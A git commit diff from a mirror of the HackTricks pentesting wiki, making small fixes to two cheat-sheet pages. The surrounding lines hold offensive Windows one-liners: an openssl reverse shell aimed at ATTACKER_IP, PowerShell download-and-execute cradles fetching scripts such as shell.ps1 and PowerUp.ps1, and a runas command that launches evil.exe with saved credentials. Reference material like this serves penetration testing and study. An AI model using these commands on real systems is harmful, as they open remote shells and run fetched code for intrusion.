mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] 2 pages modified
This commit is contained in:
parent
e527f932bc
commit
3ed8679246
|
@ -65,7 +65,7 @@ openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_cli
|
|||
```bash
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst2.ps1')"
|
||||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||||
```
|
||||
|
||||
|
|
|
@ -400,7 +400,7 @@ type <file> #Cat file
|
|||
|
||||
#Runas
|
||||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
|
||||
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||||
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||||
|
||||
#Hide
|
||||
attrib +h file #Set Hidden
|
||||
|
|
Loading…
Reference in a new issue